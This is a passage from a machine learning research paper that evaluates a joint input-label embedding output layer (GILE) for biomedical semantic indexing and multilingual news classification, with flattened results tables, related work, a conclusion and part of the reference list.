52.93M − constrained dj σ(EW)σ(Wht) 100 1.01 37.71 16.16 10.34 11.21 93.38 52.85M − only label (Eq. 6a) σ(EW)ht 100 1.06 40.81 13.77 9.77 14.71 90.56 52.84M − only input (Eq. 6b) Eσ(Wht) 100 1.07 39.78 15.67 19.28 7.18 95.91 52.84M Table 2: Biomedical semantic indexing results computed over labels seen and unseen during training, i.e. the full-resource versus zero-resource settings. Best scores among the competing models are marked in bold. put layer, trained with binary cross-entropy loss.5 Our model replaces WAN’s output layer with a generalized input-label embedding layer and its variations, noted GILE-WAN. For comparison, we also compare to bilinear input-label embedding versions of WAN for the model by Yazdani and Henderson (2015), noted as BIL-WAN [YH16], and the one by Nam et al. (2016), noted as BIL- WAN [N16]. Note that the AiTextML parameter space is huge and makes learning difficult for our models (linear wrt. labels and documents). In- stead, we make sure that our models have far fewer parameters than the baselines (Table 2). 4.1.2 Results The results on biomedical semantic indexing on seen and unseen labels are shown in Table 2. We observe that the neural baseline, WAN, outper- forms WSABIE+ and AiTextML on the seen la- bels, namely by +5.73 and +9.59 points in terms of AvgPr respectively. The differences are even more pronounced when considering the ranking loss and one error metrics. This result is compati- ble with previous findings that existing joint input- label models are not able to outperform strong su- pervised baselines on seen labels. However, WAN is not able to generalize at all to unseen labels, hence the WSABIE+ and AiTextML have a clear advantage in the zero-resource setting. In contrast, our generalized input-label model, 5 In our preliminary experiments, we also trained the neu- ral model with a hinge loss as WSABIE+ and AiTextML, but it performed similarly to them and much worse than WAN, so we did not further experiment with it. GILE-WAN, outperforms WAN even on seen la- bels, where our model has higher average preci- sion by +2.02 points, better ranking loss by +43% and comparable OneErr (−3%). And this gain is not at the expense of performance on unseen la- bels. GILE-WAN, outperforms WSABIE+, Ai- TextML variants6 by a large margin in both cases, e.g. by +7.75, +11.61 points on seen labels and by +12.58, +10.29 points in terms of average preci- sion on unseen labels, respectively. Interestingly, our GILE-WAN model also outperforms the two previous bilinear input-label embedding formula- tions of Yazdani and Henderson (2015) and Nam et al. (2016), namely BIL-WAN [YH15] and BIL- WAN [N16] by +3.71, +2.48 points on seen la- bels and +3.45 and +2.39 points on unseen la- bels, respectively, even when they are trained with the same encoders and loss as ours. These mod- els are not able to outperform the WAN baseline when evaluated on the seen labels, namely they have −1.68 and −0.46 points lower average preci- sion than WAN, but they outperform WSABIE+ and AiTextML on both seen and unseen labels. Overall, the results show a clear advantage of our generalized input-label embedding model against previous models on both seen and unseen labels. 4.1.3 Ablation Analysis To evaluate the effectiveness of individual com- ponents of our model, we performed an ablation study (last three rows in Table 2). Note that when we use only the label or only the input embedding 6Namely, avg when using the average of word vectors and inf when using inferred label vectors to make predictions. in our generalized input-label formulation, the di- mensionality of the joint space is constrained to be the dimensionality of the encoded labels and inputs respectively, that is dj=100 in our experi- ments. All three variants of our model outperform previous embedding formulations of Nam et al. (2016) and Yazdani and Henderson (2015) in all metrics except from AvgPr on seen labels where they score slightly lower. The decrease in AvgPrec for our model variants with dj=100 compared to the neural baselines could be attributed to the dif- ficulty in learning the parameters of a highly non- linear space with only a few hidden dimensions. Indeed, when we increase the number of dimen- sions (dj=500), our full model outperforms them by a large margin. Recall that this increase in ca- pacity is only possible with our full model defini- tion in Eq. 9 and none of the other variants allow us to do this without interfering with the original dimensionality of the encoded labels (E) and input (ht). In addition, our model variants with dj=100 exhibit consistently higher scores than baselines in terms of most metrics on both seen and unseen la- bels, which suggests that they are able to capture more complex relationships across labels and be- tween encoded inputs and labels. Overall, the best performance among our model variants is achieved when using only the label em- bedding and, hence, it is the most significant com- ponent of our model. Surprisingly, our model with only the label embedding achieves higher perfor- mance than our full model on unseen labels but it is far behind our full model when we consider per- formance on both seen and unseen labels. When we constrain our full model to have the same di- mensionality with the other variants, i.e. dj=100, it outperforms the one that uses only the input em- bedding in most metrics and it is outperformed by the one that uses only the label embedding. 4.2 Multilingual News Text Classification We evaluate on multilingual news text classifica- tion to demonstrate that our output layer based on the generalized input-label embedding outper- forms previous models with a typical output layer in a wide variety of settings, even for labels which have been seen during training. 4.2.1 Settings We follow the exact evaluation protocol, data and settings of Pappas and Popescu-Belis (2017), as described below. The dataset is split per language into 80% for training, 10% for validation and 10% for testing. We evaluate on both types of labels (general Yg, and specific Ys) in a full-resource scenario, and we evaluate only on the general la- bels (Yg) in a low-resource scenario. Accuracy is measured with the micro-averaged F1 percentage scores. The word embeddings for this task are the aligned pre-trained 40-dimensional multi-CCA multilingual word embeddings by Ammar et al. (2016) and are kept fixed during training.7 The sentences are already truncated at a length of 30 words and the documents at a length of 30 sen- tences. The hyper-parameters were selected on validation data as follows: 100-dimensional en- coder and attention, ReLU activation, batch size of 16, epoch size of 25k, no negative sampling (all labels are used) and optimization with ADAM until convergence. To ensure equal capacity to baselines, we use approximately the same number of parameters ntot with the baseline classification layers, by setting: dj ' dh ∗ |k(i)| dh + d , i = 1, . . . ,M, (19) in the monolingual case, and similarly, dj ' (dh ∗ ∑M i=1 |k (i)|)/(dh + d) in the multilingual case, where k(i) is the number of labels in lan- guage i. The hierarchical models have Dense encoders in all scenarios (Tables 3, 6, and 7), except from the varying encoder experiment (Table 4). For the low-resource scenario, the levels of data avail- ability are: tiny from 0.1% to 0.5%, small from 1% to 5% and medium from 10% to 50% of the original training set. For each level, the aver- age F1 across discrete increments of 0.1, 1 and 10 are reported respectively. The decision thresh- olds, which were tuned on validation data by Pap- pas and Popescu-Belis (2017), are set as follows: for the full-resource scenario it is set to 0.4 for |Ys| < 400 and 0.2 for |Ys| ≥ 400, and for the low-resource scenario it is set to 0.3 for all sets. The baselines are all the monolingual and multi- lingual neural networks from Pappas and Popescu- Belis (2017)8, noted as [PB17], namely: 7The word embeddings are not included in the parameters statistics because they are not variables of the network. 8For reference, in Table 4 we also compare to a logistic regression trained with unigrams over the full vocabulary and Models Languages (en + aux → en) Languages (en + aux → aux) Stat. Yg abbrev. de es pt uk ru ar fa de es pt uk ru ar fa avg [P B 17 ] M on o NN (Avg) 50.7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53.1 70.0 57.2 80.9 59.3 64.4 66.6 57.6 HNN (Avg) 70.0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67.9 82.5 70.5 86.8 77.4 79.0 76.6 73.6 HAN (Att) 71.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71.8 82.8 71.3 85.3 79.8 80.5 76.6 74.7 M ul ti MHAN-Enc 71.0 69.9 69.2 70.8 71.5 70.0 71.3 69.7 82.9 69.7 86.8 80.3 79.0 76.0 74.1 MHAN-Att 74.0 74.2 74.1 72.9 73.9 73.8 73.3 72.5 82.5 70.8 87.7 80.5 82.1 76.3 76.3 MHAN-Both 72.8 71.2 70.5 65.6 71.1 68.9 69.2 70.4 82.8 71.6 87.5 80.8 79.1 77.1 74.2 O ur s M on o GILE-NN (Avg) 60.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60.3 76.6 62.1 82.0 65.7 77.4 68.6 65.2 GILE-HNN (Avg) 74.8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71.3 83.3 72.6 88.3 81.5 81.9 77.1 77.1 GILE-HAN (Att) 76.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74.2 83.4 71.9 86.1 82.7 81.0 77.2 78.0 M ul ti GILE-MHAN-Enc 75.1 74.0 72.7 70.7 74.4 73.5 73.2 72.7 83.4 73.0 88.7 82.8 83.3 77.4 76.7 GILE-MHAN-Att 76.5 76.5 76.3 75.3 76.1 75.6 75.2 74.5 83.5 72.7 88.0 83.4 82.1 76.7 78.0 GILE-MHAN-Both 75.3 73.7 72.1 67.2 72.5 73.8 69.7 72.6 84.0 73.5 89.0 81.9 82.0 77.7 76.0 Ys Models de es pt uk ru ar fa de es pt uk ru ar fa avg [P B 17 ] M on o NN (Avg) 24.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21.8 22.1 24.3 33.0 26.0 24.1 32.1 25.3 HNN (Avg) 39.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39.6 37.9 33.6 42.2 39.3 34.6 43.1 38.9 HAN (Att) 43.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44.8 46.3 41.9 46.4 45.8 41.2 49.4 44.2 M ul ti MHAN-Enc 45.4 45.9 44.3 41.1 42.1 44.9 41.0 43.9 46.2 39.3 47.4 45.0 37.9 48.6 43.8 MHAN-Att 46.3 46.0 45.9 45.6 46.4 46.4 46.1 46.5 46.7 43.3 47.9 45.8 41.3 48.0 45.8 MHAN-Both 45.7 45.6 41.5 41.2 45.6 44.6 43.0 45.9 46.4 40.3 46.3 46.1 40.7 50.3 44.5 O ur s M on o GILE-NN (Avg) 27.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27.5 28.4 29.2 36.8 31.6 32.1 35.6 29.5 GILE-HNN (Avg) 43.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43.4 42.0 37.7 43.0 42.9 36.6 44.1 42.2 GILE-HAN (Att) 45.9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47.3 47.4 42.6 46.6 46.9 41.9 48.6 45.9 M ul ti GILE-MHAN-Enc 46.0 46.6 41.2 42.5 46.4 43.4 41.8 47.2 47.7 41.5 49.5 46.6 41.4 50.7 45.1 GILE-MHAN-Att 47.3 47.0 45.8 45.5 46.2 46.5 45.5 47.6 47.9 43.5 49.1 46.5 42.2 50.3 46.5 GILE-MHAN-Both 47.0 46.7 42.8 42.0 45.6 42.8 39.3 48.0 47.6 43.1 48.5 46.0 42.1 49.0 45.0 Table 3: Full-resource classification results on general (upper half) and specific (lower half) labels using mono- lingual and bilingual models with DENSE encoders on English as target (left) and the auxiliary language as target (right). The average bilingual F1-score (%) is noted avg and the top ones per block are underlined. The monolin- gual scores on the left come from a single model, hence a single score is repeated multiple times; the repetition is marked with consecutive dots. • NN: A neural network which feeds the av- erage vector of the input words directly to a classification layer, as the one used by Kle- mentiev et al. (2012). • HNN: A hierarchical network with encoders and average pooling at every level, followed by a classification layer, as the one used by Tang et al. (2015). • HAN: A hierarchical network with encoders and attention, followed by a classification layer, as the one used by Yang et al. (2016). • MHAN: Three multilingual hierarchical net- works with shared encoders, noted MHAN- Enc, shared attention, noted MHAN-Att, and shared attention and encoders, noted MHAN-Both, as the ones used by Pappas and Popescu-Belis (2017). To ensure a controlled comparison to the above baselines, for each model we evaluate a ver- sion where their output layer is replaced by our generalized input-label embedding output layer over the top-10% most frequent words by Mrini et al. (2017), noted as [M17], which use the same settings and data. using the same number of parameters; these have the abbreviation “GILE” prepended in their name (e.g. GILE-HAN). The scores of HAN and MHAN models in Tables 3, 6 and 7 are the ones re- ported by Pappas and Popescu-Belis (2017), while for Table 4 we train them ourselves using their code. Lastly, the best score for each pairwise com- parison between a joint input-label model and its counterpart is marked in bold. 4.2.2 Results Table 3 displays the results of full-resource docu- ment classification using DENSE encoders for both general and specific labels. On the left, we display the performance of models on the English sub- corpus when English and an auxiliary language are used for training, and on the right, the perfor- mance on the auxiliary language sub-corpus when that language and English are used for training. The results show that in 98% of comparisons on general labels (top half of Table 3) the joint input- label models improve consistently over the cor- responding models using a typical sigmoid clas- sification layer. This finding validates our main hypothesis that the joint input-label models suc- Models Languages Statistics abbrev. en de es pt uk ru ar fa nl fl [M 17 ] LogReg-BOW 75.8 72.9 81.4 74.3 91.0 79.2 82.0 77.0 26M 79.19 LogReg-BOW-10% 74.7 70.1 80.6 71.1 89.5 76.5 80.8 75.5 5M 77.35 [P B 17 ] HAN-BIGRU 76.3 74.1 84.5 72.9 87.7 82.9 81.7 75.3 377K 79.42 HAN-GRU 77.1 72.5 84.0 70.8 86.6 83.0 82.9 76.0 138K 79.11 HAN-DENSE 71.2 71.8 82.8 71.3 85.3 79.8 80.5 76.6 50K 77.41 O ur s GILE-HAN-BIGRU 78.1 73.6 84.9 72.5 89.0 82.4 82.5 75.8 377K 79.85 GILE-HAN-GRU 77.1 72.6 84.7 72.4 88.6 83.6 83.4 76.0 138K 79.80 GILE-HAN-DENSE 76.5 74.2 83.4 71.9 86.1 82.7 82.6 77.2 50K 79.12 Table 4: Full-resource classification results on general (Yg) topic labels with DENSE and GRU encoders. Reported are also the average number of parameters per language (nl), and the average F1 per language (fl). cessfully exploit the semantics of the labels, which provide useful cues for classification, as opposed to models which are agnostic to label semantics. The results for specific labels (bottom half of Ta- ble 3) demonstrate the same trend, with the joint input-label models performing better in 87% of comparisons. In Table 5, we also directly compare our em- bedding to previous bilinear input-label embed- ding formulations when using the best monolin- gual configuration (HAN) from Table 3, exactly as done in Section 4.1. The results on the general labels show that GILE outperforms the previous bilinear input-label models, BIL [YH15] and BIL [N16], by +1.62 and +3.3 percentage points on av- erage respectively. This difference is much more pronounced on the specific labels, where the label set is much larger, namely +6.5 and +13.5 percent- age points respectively. Similarly, our model with constrained dimensionality is also as good or bet- ter on average than the bilinear input-label models, by +0.9 and +2.2 on general labels and by -0.5 and +6.1 on specific labels respectively, which high- lights the importance of learning non-linear rela- tionships across encoded labels and documents. Among our ablated model variants, as in previous section, the best is the one with only the label pro- jection but it still worse than our full model by - 5.2 percentage points. The improvements of GILE against each baseline is significant and consistent on both datasets. Hence, in the following experi- ments we will only consider the best of these al- ternatives. The best bilingual performance on average is that of the GILE-MHAN-Att model, for both gen- eral and specific labels. This improvement can be attributed to the effective sharing between la- HAN Languages Yg output layer en de es pt uk ru ar fa Linear [PB17] 71.2 71.8 82.8 71.3 85.3 79.8 80.5 76.6 BIL [YH15] 71.7 70.5 82.0 71.1 86.6 80.6 80.4 76.0 BIL [N16] 69.8 69.1 80.9 67.4 87.5 79.9 78.4 75.1 GILE (Ours) 76.5 74.2 83.4 71.9 86.1 82.7 82.6 77.2 - constrained dj 73.6 73.1 83.3 71.0 87.1 81.6 80.4 76.4 - only label 71.4 69.6 82.1 70.3 86.2 80.6 81.1 76.2 - only input 55.1 54.2 80.6 66.5 85.6 60.8 78.9 74.0 Ys output layer en de es pt uk ru ar fa Linear[PB17] 43.4 44.8 46.3 41.9 46.4 45.8 41.2 49.4 BIL [YH15] 40.7 37.8 38.1 33.5 44.6 38.1 39.1 42.6 BIL [N16] 34.4 30.2 34.4 33.6 31.4 22.8 35.6 38.9 GILE (Ours) 45.9 47.3 47.4 42.6 46.6 46.9 41.9 48.6 - constrained dj 38.5 38.0 36.8 35.1 42.1 36.1 36.7 48.7 - only label 38.4 41.5 42.9 38.3 44.0 39.3 37.2 43.4 - only input 12.1 10.8 8.8 20.5 11.8 7.8 12.0 24.6 Table 5: Direct comparison with previous bilin- ear input-label models, namely BIL [YH15] and BIL [N16], and with our ablated model variants using the best monolingual configuration (HAN) from Table 3 on both general (upper half) and specific (lower half) labels. Best scores among the competing models are marked in bold. bel semantics across languages through the joint multilingual input-label output layer. Effectively, this model has the same multilingual sharing scheme with the best model reported by Pappas and Popescu-Belis (2017), MHAN-Att, namely sharing attention at each level of the hierarchy, which agrees well with their main finding. In- terestingly, the improvement holds when using different types of hierarchical encoders, namely Models General labels Specific labels abbrev. # lang. nl fl nl fl [P B 17 ] HAN 1 50K 77.41 90K 44.90 MHAN 2 40K 78.30 80K 45.72 MHAN 8 32K 77.91 72K 45.82 O ur s GILE-HAN 1 50K 79.12 90K 45.90 GILE-MHAN 2 40K 79.68 80K 46.49 GILE-MHAN 8 32K 79.48 72K 46.32 Table 6: Multilingual learning results. The columns are the average number of parameters per language (nl), average F1 per language (fl). DENSE GRU, and biGRU, as shown in Table 4, which demonstrate the generality of the approach. In addition, our best models outperform logis- tic regression trained either on top-10% most fre- quent words or on the full vocabulary, even though our models utilize many fewer parameters, namely 377K/138K vs. 26M/5M. Increasing the capacity of our models should lead to even further improve- ments. Multilingual learning. So far, we have shown that the proposed joint input-label models outper- form typical neural models when training with one and two languages. Does the improvement remain when increasing the number of languages even more? To answer the question we report in Table 6 the average F1-score per language for the best baselines from the previous experiment (HAN and MHAN-Att) with the proposed joint input-label versions of them (GILE-HAN and GILE-MHAN- Att) when increasing the number of languages (1, 2 and 8) that are used for training. Overall, we ob- serve that the joint input-label models outperform all the baselines independently of the number of languages involved in the training, while having the same number of parameters. We also replicate the previous result that a second language helps but beyond that there is no improvement. Low-resource transfer. We investigate here whether joint input-label models are useful for low-resource languages. Table 7 shows the low- resource classification results from English to seven other languages when varying the amount of their training data. Our model with both shared en- coders and attention, GILE-MHAN, outperforms previous models in average, namely HAN (Yang et al., 2016) and MHAN (Pappas and Popescu- Belis, 2017), for low-resource classification in the majority of the cases. Levels [PB17] Ours range HAN MHAN GILE-MHAN en → de 0.1-0.5% 29.9 39.4 42.9 1-5% 51.3 52.6 51.6 10-50% 63.5 63.8 65.9 en → es 0.1-0.5% 39.5 41.5 39.0 1-5% 45.6 50.1 50.9 10-50% 74.2 75.2 76.4 en → pt 0.1-0.5% 30.9 33.8 39.6 1-5% 44.6 47.3 48.9 10-50% 60.9 62.1 62.3 en → uk 0.1-0.5% 60.4 60.9 61.1 1-5% 68.2 69.0 69.4 10-50% 76.4 76.7 76.5 en → ru 0.1-0.5% 27.6 29.1 27.9 1-5% 39.3 40.2 40.2 10-50% 69.2 69.4 70.4 en → ar 0.1-0.5% 35.4 36.6 46.1 1-5% 45.6 46.6 49.5 10-50% 48.9 47.8 61.8 en → fa 0.1-0.5% 36.0 41.3 42.5 1-5% 55.0 55.5 55.4 10-50% 69.2 70.0 69.7 Table 7: Low-resource classification results with vari- ous sizes of training data using the general labels. The shared input-label space appears to be help- ful especially when transferring from English to German, Portuguese and Arabic languages. GILE- MHAN is significantly behind MHAN on trans- ferring knowledge from English to Spanish and to Russian in the 0.1-0.5% resource setting, but in the rest of the cases they have very similar scores. Label sampling. To speedup computation it is possible to train our model by sampling labels, in- stead of training over the whole label set. How much speed-up can we achieve from this label sampling approach and still retain good levels of performance? In Figure 2, we attempt to answer this question by reporting the performance of our GILE-HNN model when varying the amount of labels (%) that it uses for training over English general and specific labels of the DW dataset. In both cases, the performance of GILE-HNN tends to increase as the percentage of labels sampled in- creases, but it levels off for the higher percentages. For general labels, top performance is reached with a 40% to 50% sampling rate, which translates to a 22% to 18% speedup, while for the specific labels, it is reached with a 60% to 70% sampling rate, which translates to a 40% to 36% speedup. Figure 2: Varying sampling percentage for general and specific English labels. (Top) GILE-HNN is compared against HNN in terms of F1 (%). (Bottom) The runtime speedup over GILE-HNN trained on the full label set. The speedup is correlated to the size of the label set, since there are many fewer general labels than specific labels, namely 327 vs 1,058 here. Hence, we expect even higher speedups for bigger label sets. Interestingly, GILE-HNN with label sam- pling reaches the performance of the baseline with a 25% and 60% sample for general and specific labels respectively. This translates to a speedup of 30% and 50% respectively compared to a GILE- HNN trained over all labels. Overall, these results show that our model is effective and that it can also scale to large label sets. The label sampling should also be useful in tasks where the computation re- sources may be limited or budgeted. 5 Related Work 5.1 Neural text Classification Research in neural text classification was initially based on feed-forward networks, which required unsupervised pre-training (Collobert et al., 2011; Mikolov et al., 2013; Le and Mikolov, 2014) and later on they focused on networks with hierarchi- cal structure. Kim (2014) proposed a convolu- tional neural network (CNN) for sentence clas- sification. Johnson and Zhang (2015) proposed a CNN for high-dimensional data classification, while Zhang et al. (2015) adopted a character-level CNN for text classification. Lai et al. (2015) pro- posed a recurrent CNN to capture sequential infor- mation, which outperformed simpler CNNs. Lin et al. (2015) and Tang et al. (2015) proposed hi- erarchical recurrent neural networks and showed that they were superior to CNN-based models. Yang et al. (2016) demonstrated that a hierarchi- cal attention network with bi-directional gated en- coders outperforms previous alternatives. Pappas and Popescu-Belis (2017) adapted such networks to learn hierarchical document structures with shared components across different languages. The issue of scaling to large label sets has been addressed previously by output layer approx- imations (Morin and Bengio, 2005) and with the use of sub-word units or character-level modeling (Sennrich et al., 2016; Lee et al., 2017) which is mainly applicable to structured prediction prob- lems. Despite the numerous studies, most of the existing neural text classification models ignore label descriptions and semantics. Moreover, they are based on typical output layer parametrizations which are dependent on the label set size, and thus are not able to scale well to large label sets nor to generalize to unseen labels. Our output layer parametrization addresses these limitations and could potentially improve such models. 5.2 Output Representation Learning There exist studies which aim to learn output rep- resentations directly from data without any se- mantic grounding to word embeddings (Srikumar and Manning, 2014; Yeh et al., 2018; Augen- stein et al., 2018). Such methods have a label- set-size dependent parametrization, which makes them data hungry, less scalable on large label sets and incapable of generalizing to unseen classes. Wang et al. (2018) addressed the lack of seman- tic grounding to word embeddings by proposing an efficient method based on label-attentive text representations which are helpful for text classi- fication. However, in contrast to our study, their parametrization is still label-set-size dependent and thus their model is not able to scale well to large label sets nor to generalize to unseen labels. 5.3 Zero-shot Text Classification Several studies have focused on learning joint input-label representations grounded to word se- mantics for unseen label prediction for images (Weston et al., 2011; Socher et al., 2013; Norouzi et al., 2014; Zhang et al., 2016; Fu et al., 2018), called zero-shot classification. However, there are fewer such studies for text classification. Dauphin et al. (2014) predicted semantic utterances of text by mapping them in the same semantic space with the class labels using an unsupervised learning ob- jective. Yazdani and Henderson (2015) proposed a zero-shot spoken language understanding model based on a bilinear input-label model able to gen- eralize to previously unseen labels. Nam et al. (2016), proposed a bilinear joint document-label embedding which learns shared word representa- tions between documents and labels. More re- cently, Shu et al. (2017) proposed an approach for open-world classification which aims to identify novel documents during testing but it is not able to generalize to unseen classes. Perhaps, the most similar model to ours is from the recent study by Pappas et al. (2018) on neural machine translation, with the difference that they have single-word la- bel descriptions and they use a label-set-dependent bias in a softmax linear prediction unit, which is designed for structured prediction. Hence, their model can neither handle unseen labels nor multi- label classification, as we do here. Compared to previous joint input-label models, the proposed model has a more general and flexi- ble parametrization which allows the output layer capacity to be controlled. Moreover, it is not re- stricted to linear mappings, which have limited expressivity, but uses nonlinear mappings, similar to energy-based learning networks (LeCun et al., 2006; Belanger and McCallum, 2016). The link to the latter can be made if we regard P(ij)val in Eq. 11 as an energy function for the i-th document and the j-th label, the calculation of which uses a simple multiplicative transformation (Eq. 10). Lastly, the proposed model performs well on both seen and unseen label sets by leveraging the binary cross- entropy loss, which is the standard loss for classi- fication problems, instead of a ranking loss. 6 Conclusion We proposed a novel joint input-label embedding model for neural text classification which gener- alizes over existing input-label models and ad- dresses their limitations while preserving high per- formance on both seen and unseen labels. Com- pared to baseline neural models with a typical out- put layer, our model is more scalable and has bet- ter performance on the seen labels. Compared to previous joint input-label models, it performs sig- nificantly better on unseen labels without compro- mising performance on the seen labels. These im- provements can be attributed to the the ability of our model to capture complex input-label relation- ships, to its controllable capacity and to its training objective which is based on cross-entropy loss. As future work, the label representation could be learned by a more sophisticated encoder, and the label sampling could benefit from importance sampling to avoid revisiting uninformative labels. Another interesting direction would be to find a more scalable way of increasing the output layer capacity, for instance using a deep rather than wide classification network. Moreover, adapting the proposed model to structured prediction, for instance by using a softmax classification unit in- stead of a sigmoid one, would benefit tasks such as neural machine translation, language model- ing and summarization, in isolation but also when trained jointly with multi-task learning. Acknowledgments We are grateful for the support from the Euro- pean Union through its Horizon 2020 program in the SUMMA project n. 688139, see http: //www.summa-project.eu. We would also like to thank our action editor, Eneko Agirre, and the anonymous reviewers for their invaluable sug- gestions and feedback. References Waleed Ammar, George Mulcaire, Yulia Tsvetkov, Guillaume Lample, Chris Dyer, and Noah A. Smith. 2016. Massively multilingual word em- beddings. CoRR, abs/1602.01925.v2. Isabelle Augenstein, Sebastian Ruder, and An- ders Søgaard. 2018. Multi-task learning of pairwise sequence classification tasks over dis- parate label spaces. In Proceedings of the 2018 Conference of the North American Chap- ter of the Association for Computational Lin- guistics: Human Language Technologies, Vol- ume 1 (Long Papers), pages 1896–1906, New Orleans, Louisiana. David Belanger and Andrew McCallum. 2016. Structured prediction energy networks. In Pro- ceedings of The 33rd International Conference on Machine Learning, volume 48 of Proceed- ings of Machine Learning Research, pages 983– 992, New York, New York, USA. PMLR. Jianshu Chen, Ji He, Yelong Shen, Lin Xiao, Xi- aodong He, Jianfeng Gao, Xinying Song, and Li Deng. 2015. End-to-end learning of LDA by mirror-descent back propagation over a deep architecture. In Advances in Neural Informa- tion Processing Systems 28, pages 1765–1773, Montreal, Canada. http://www.summa-project.eu http://www.summa-project.eu https://arxiv.org/abs/1602.01925.v2 https://arxiv.org/abs/1602.01925.v2 http://www.aclweb.org/anthology/N18-1172 http://www.aclweb.org/anthology/N18-1172 http://www.aclweb.org/anthology/N18-1172 http://proceedings.mlr.press/v48/belanger16.html https://papers.nips.cc/paper/5967-end-to-end-learning-of-lda-by-mirror-descent-back-propagation-over-a-deep-architecture https://papers.nips.cc/paper/5967-end-to-end-learning-of-lda-by-mirror-descent-back-propagation-over-a-deep-architecture https://papers.nips.cc/paper/5967-end-to-end-learning-of-lda-by-mirror-descent-back-propagation-over-a-deep-architecture Kyunghyun Cho, Bart van Merrienboer, Caglar Gulcehre, Dzmitry Bahdanau, Fethi Bougares, Holger Schwenk, and Yoshua Bengio. 2014. Learning phrase representations using RNN encoder–decoder for statistical machine transla- tion. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Pro- cessing, pages 1724–1734, Doha, Qatar. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011. Natural language processing (al- most) from scratch. Journal of Machine Learn- ing Research, 12:2493–2537. Yann N. Dauphin, Gökhan Tür, Dilek Hakkani- Tür, and Larry P. Heck. 2014. Zero-shot learn- ing and clustering for semantic utterance classi- fication. In International Conference on Learn- ing Representations, Banff, Canada. Orhan Firat, Baskaran Sankaran, Yaser Al- Onaizan, Fatos T. Yarman Vural, and Kyunghyun Cho. 2016. Zero-resource translation with multi-lingual neural machine translation. In Proceedings of the 2016 Con- ference on Empirical Methods in Natural Language Processing, pages 268–277, Austin, USA. Andrea Frome, Greg S. Corrado, Jon Shlens, Samy Bengio, Jeff Dean, Marc Aurelio Ran- zato, and Tomas Mikolov. 2013. DeViSE: A deep visual-semantic embedding model. In C. J. C. Burges, L. Bottou, M. Welling, Z. Ghahramani, and K. Q. Weinberger, edi- tors, Advances in Neural Information Process- ing Systems 26, pages 2121–2129. Curran As- sociates, Inc. Yanwei Fu, Tao Xiang, Yu-Gang Jiang, Xi- angyang Xue, Leonid Sigal, and Shaogang Gong. 2018. Recent advances in zero-shot recognition: Toward data-efficient understand- ing of visual content. IEEE Signal Processing Magazine, 35(1):112–125. Rie Johnson and Tong Zhang. 2015. Effective use of word order for text categorization with convolutional neural networks. In Proceedings of the 2015 Conference of the North Ameri- can Chapter of the Association for Computa- tional Linguistics: Human Language Technolo- gies, pages 103–112, Denver, Colorado. Yoon Kim. 2014. Convolutional neural networks for sentence classification. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, pages 1746– 1751, Doha, Qatar. Alexandre Klementiev, Ivan Titov, and Binod Bhattarai. 2012. Inducing crosslingual dis- tributed representations of words. In Pro- ceedings of COLING 2012, pages 1459–1474, Mumbai, India. Ankit Kumar, Ozan Irsoy, Jonathan Su, James Bradbury, Robert English, Brian Pierce, Pe- ter Ondruska, Ishaan Gulrajani, and Richard Socher. 2015. Ask me anything: Dynamic memory networks for natural language process- ing. In Proceedings of The 33rd International Conference on Machine Learning, pages 334– 343, New York City, USA. Siwei Lai, Liheng Xu, Kang Liu, and Jun Zhao. 2015. Recurrent convolutional neural networks for text classification. In Proceedings of the 29th AAAI Conference on Artificial Intelligence, pages 2267–2273, Austin, USA. Quoc V. Le and Tomas Mikolov. 2014. Distributed representations of sentences and documents. In Proceedings of The 31st International Confer- ence on Machine Learning, pages 1188âĂŞ– 1196, Beijing, China. Yann LeCun, Sumit Chopra, Raia Hadsell, Fu Jie Huang, and et al. 2006. A tutorial on energy- based learning. In Predicting Structured Data. MIT Press. Jason Lee, Kyunghyun Cho, and Thomas Hof- mann. 2017. Fully character-level neural ma- chine translation without explicit segmentation. Transactions of the Association for Computa- tional Linguistics, 5:365–378. Rui Lin, Shujie Liu, Muyun Yang, Mu Li, Ming Zhou, and Sheng Li. 2015. Hierarchical recur- rent neural network for document modeling. In Proceedings of the 2015 Conference on Empir- ical Methods in Natural Language Processing, pages 899–907, Lisbon, Portugal. Thang Luong, Hieu Pham, and Christopher D. Manning. 2015. Effective approaches to attention-based neural machine translation. In https://aclanthology.coli.uni-saarland.de/papers/D14-1179/d14-1179 https://aclanthology.coli.uni-saarland.de/papers/D14-1179/d14-1179 https://aclanthology.coli.uni-saarland.de/papers/D14-1179/d14-1179 http://www.jmlr.org/papers/v12/collobert11a.html http://www.jmlr.org/papers/v12/collobert11a.html http://arxiv.org/abs/1401.0509 http://arxiv.org/abs/1401.0509 http://arxiv.org/abs/1401.0509 https://aclweb.org/anthology/D16-1026 https://aclweb.org/anthology/D16-1026 https://aclweb.org/anthology/D16-1026 http://papers.nips.cc/paper/5204-devise-a-deep-visual-semantic-embedding-model.pdf http://papers.nips.cc/paper/5204-devise-a-deep-visual-semantic-embedding-model.pdf https://doi.org/10.1109/MSP.2017.2763441 https://doi.org/10.1109/MSP.2017.2763441 https://doi.org/10.1109/MSP.2017.2763441 https://aclanthology.coli.uni-saarland.de/papers/N15-1011/n15-1011 https://aclanthology.coli.uni-saarland.de/papers/N15-1011/n15-1011 https://aclanthology.coli.uni-saarland.de/papers/N15-1011/n15-1011 https://aclanthology.info/papers/D14-1181/d14-1181 https://aclanthology.info/papers/D14-1181/d14-1181 http://www.aclweb.org/anthology/C12-1089 http://www.aclweb.org/anthology/C12-1089 http://proceedings.mlr.press/v48/kumar16.html http://proceedings.mlr.press/v48/kumar16.html http://proceedings.mlr.press/v48/kumar16.html https://www.aaai.org/ocs/index.php/AAAI/AAAI15/paper/view/9745/9552 